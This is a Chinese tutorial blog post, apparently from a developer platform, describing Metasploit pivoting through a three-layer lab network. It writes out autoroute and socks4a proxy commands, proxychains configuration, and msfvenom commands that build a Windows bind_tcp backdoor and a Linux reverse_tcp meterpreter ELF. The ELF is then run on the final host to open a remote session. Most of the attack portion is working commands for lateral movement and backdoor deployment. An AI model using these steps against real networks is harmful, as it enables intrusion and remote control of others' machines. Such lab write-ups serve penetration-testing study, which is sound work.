MSF三层网络渗透

 网络拓扑图如下

假设已经拿到了跳板机B的权限
其中A、B、C为windows D为linux服务器

ipconfig发现存在两张网卡
192.168.31.60
192.168.3.31

 

在kali(A主机)meterpreter 中添加去往 192.168.3.0网段的路由并且启动socks4a代理 

meterpreter > run autoroute -s 192.168.3.0/24                      #添加路由
meterpreter > run autoroute -p                                     #查看路由
msf6 exploit(multi/handler) > use auxiliary/server/socks4a         #使用socks4a协议并运行

注:socks4a在msf中默认远端端口为1080端口,故在/etc/proxychains.conf 也要设置为1080端口

 

vi /etc/proxychains.conf 
添加 socks4  192.168.31.31 1080

成功访问第二层网络

 

msf配合Proxifier实现内网穿透
在本机连接kali的1080端口(socks4a)

本机通过Proxifier成功访问第二层网络(C主机)

制作后门穿透第三层网络(正向连接)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4321 -f exe -o 4321.exe
注:C主机监听4321端口,B主机主动连接C主机。

 

 

use exploit/multi/handler
连接C主机的ip 192.168.3.3

 

成功得到会话

ipconfig发现存在两张网卡
192.168.3.3
10.10.10.1

添加去往 192.168.3.0网段的路由并且启动socks4a代理
meterpreter > run autoroute -s 10.10.10.0/24                      #添加路由
meterpreter > run autoroute -p                                    #查看路由
msf6 exploit(multi/handler) > use auxiliary/server/socks4a        #使用socks4a协议并运行

 

设置socks4a端口为9999

 

vi /etc/proxychains.conf 
添加 socks4  192.168.31.31 9999

 proxychains curl http://10.10.10.2/ip.txt
可以看到代理经过了192.168.31.31:1080->192.168.31.31:9999成功访问第三层网络的主机 10.10.10.2

 本机访问也可以访问到第三层网络

 

 

生成一个反向后门(因为D主机为linux,故生成一个elf格式的后门)
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost 10.10.10.1 lport=1234 -f elf -o 123.elf

 

监听 linux/x86/meterpreter/reverse_tcp

 

 在D主机上执行后门
 chmod +x 123.elf
./123.elf

 10.0.0.2(D主机)成功上线

 

 

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值